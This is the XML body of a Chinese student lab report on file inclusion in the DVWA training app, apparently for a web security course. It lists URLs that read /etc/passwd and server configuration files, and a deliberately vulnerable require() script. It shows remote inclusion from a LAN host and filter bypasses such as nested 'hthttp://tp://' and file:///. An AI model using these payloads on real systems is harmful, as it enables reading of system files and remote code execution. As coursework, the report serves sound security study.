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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/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实验报告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课程：《web应用安全》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班级：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网安2202</w:t>
      </w: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学号：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3220812128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姓名：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章百琪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实验名称：实验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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>（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文件包含漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>）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both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日期：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2024.5.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:left="360" w:leftChars="0" w:firstLine="640" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs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实验目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="640" w:firstLineChars="200"/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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="640" w:firstLineChars="200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实验内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="22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>一、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ow级别:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看view source，没有任何过滤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast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1、本地文件包含测试：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nclude()函数包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast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652780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5270500" cy="3039745"/>
            <wp:effectExtent l="0" t="0" r="0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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/passwd（查看linux服务器用户信息）" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>passwd（查看linux服务器用户信息）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="220795"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（查看apache2配置信息</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="30397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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../php.ini（查看php配置文件）" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../php.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（查看php配置文件）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="303974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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../phpinfo.php（查看php配置信息）" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/fi/?page=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>../../phpinfo.php（查看php配置信息）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3039745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require()函数包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast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创建一个rfi.php文件，文件内容：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;?php require($_GET[file]);?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>,将文件上传到网站根目录下（/var/www/html/dvwa）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过命令执行上传文件</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="303974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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4159250" cy="33401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创建一个echo.txt文件，文件内容：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;?php echo "hello world"; ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>，将文件上传到网站根目录下（/var/www/html/dvwa）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="303974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114300" distR="114300">
            <wp:extent cx="4121150" cy="32639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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/rfi.php?file=echo.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（通过rfi.php文件里的require函数包含，echo.txt文件被运行）</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3039745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</w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1/dvwa/rfi.php?file=/etc/passwd" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/rfi.php?file=/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（查看linux服务器用户信息）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spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3039745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2、远程文件包含测试：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/rfi.php?file=http://192.168.18.129/dvwa/echo.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>（查看192.168.18.129服务器上的echo.txt文件）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="303974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>二、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>edium级别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看view  source,发现屏蔽了../，..\，http://，https://。考虑绕过方式：大写（如：HTTP）,截断，绝对路径等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast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1、本地文件包含测试：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/var/www/html/dvwa/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>phpinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>.php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（使用绝对路径绕过，查看PHP配置信息）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="30397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2、远程文件包含测试：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:color w:val="C00000"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>127.0.0.1/dvwa/rfi.php?file=http://192.168.18.129/dvwa/echo.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3039745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Style w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>绕过方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http:/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/改成大写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>：HTTP://</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t> ht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="F33B45"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>tp://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间被代替成""后 剩下的字符任然是 http://, 成功绕过。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="22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>三、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>igh级别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有输入验证，只有文件名是有 file 开头的文件才能打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/fi/?page=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>file:///</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>etc/apache2/apache2.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>四、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Impossible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>级别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="345" w:firstLineChars="15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3"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>分析源码可以看到,使用白名单,page只能为”include.php”、“file1.php”、“file2.php”、“file3.php”之一，只允许包含include.php、file1.php、file2.php、file3.php，不能包含别的文件，彻底杜绝文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验心得</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1395"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过本次实验，我学到了以下内容：</w:t>
      </w:r>
    </w:p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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞利用多样性： 低级别安全措施容易被绕过，而高级别措施显著提高了防护能力。</w:t>
      </w:r>
    </w:p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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安全防护的重要性： 严格输入验证和白名单策略是有效防护手段。</w:t>
      </w:r>
    </w:p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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实战技能提升： 通过实验，提升了漏洞利用和绕过技巧，并学会如何在实际开发中预防和应对这些漏洞。</w:t>
      </w:r>
    </w:p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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>严格输入验证： 避免恶意输入导致安全漏洞。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>白名单策略： 限制可包含文件范围，增强安全性。</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="708" w:footer="708" w:gutter="0"/>
      <w:cols w:space="708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C168E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F99C168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000000"/>
    <w:rsid w:val="08F8136C"/>
    <w:rsid w:val="0A3208AE"/>
    <w:rsid w:val="1ED54C34"/>
    <w:rsid w:val="2D805B53"/>
    <w:rsid w:val="2E516BDC"/>
